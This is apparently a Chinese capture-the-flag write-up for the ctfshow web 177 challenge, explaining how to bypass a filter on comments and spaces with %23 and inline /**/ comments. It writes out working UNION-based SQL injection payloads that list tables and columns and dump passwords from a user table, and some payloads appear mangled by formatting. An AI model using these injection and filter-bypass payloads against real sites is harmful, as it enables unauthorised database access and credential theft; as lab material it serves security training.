ctf show web 177

这题跟176类似我们先正常进行SQL注入

在payload为1'时可正常回显但是当payload加上--+注释时却不会回显,所以我们猜测过滤了--+,我们用%23代替试试看

发现此时正常然后继续正常的SQL注入操作

在测试字段数时又发生了没有回显的情况我们猜测现在除了对--+的过滤外还有别的过滤,通关尝试发现是对空格进行了过滤,我们使用内联注释过滤

很多 Web 应用的 WAF(Web 应用防火墙)或后端代码会使用简单的正则表达式或黑名单来过滤敏感关键字(例如 SELECT、UNION、WHERE、空格等)。内联注释绕过的原理主要利用了以下两点:

替换空格:数据库解释器会将连续的注释块视为分隔符,从而可以用注释代替空格。

数据库解析特性:部分数据库(尤其是 MySQL)对内联注释有特殊的扩展语法,允许注释内部的代码被正常执行,但防护规则可能会漏报。

  1. 常见使用场景

(1) 绕过空格过滤

当后端代码过滤了空格、%20 或 + 时,可以使用内联注释 // 代替空格
我们尝试使用/
/来绕过

发现字段数为3

我们开始构造payload:-1'//union/ /select/**/1,database(),3%23

-1'union//select/ /1,table_name,3//from/ /information_schema.tables//where/ /table_schema=database()%23

-1'union//select/ /1,column_name,3//from/ /information_schema.columns//where//table_name='ctfshow_user'%23

-1'union//select/ /1,'hack',password//from//ctfshow_user%23

就得到了flag

最后payload语句构造为-1' union SELECT 1,'hack',password from ctfshow_user--+

是因为题目提示我们username不能为flag所以为了让username中不出现flag我们手动把他改为'字符',这个字符可以自定义

相关推荐
不一样的少年_1 小时前
PNG/JPG 如何变成 WebP?真相不是改后缀!
前端·后端·图片资源
杉氧1 小时前
RN 性能调优指南:重渲染(Re-renders)控制与长列表(FlatList)优化
android·前端·react native
一_个前端1 小时前
[JS] 一站式搞定 PDF、图片、Dom弹窗、表格的浏览器打印功能
前端
JavaGuide1 小时前
阿里 Qoder 又开源了一个专门给 Claude Code、Codex 做“体检”的项目
前端·后端
不一样的少年_1 小时前
JPEG 压缩到底在干嘛?小白也能看懂的 8 步拆解
前端·后端·图片资源
三小河2 小时前
RAG、LLM Wiki、本体(Ontology)到底是个啥?
前端·人工智能·后端
大模型码小白2 小时前
数据可视化:AI 生成 HTML5 动态交互式数据图表
前端·数据库·人工智能·深度学习·机器学习·信息可视化·html5
八荒启·交互动画2 小时前
Web特效01—什么是渲染
前端·javascript·网页特效·八荒启-交互动画
小肥君2 小时前
前端测试websocket
前端·websocket·状态模式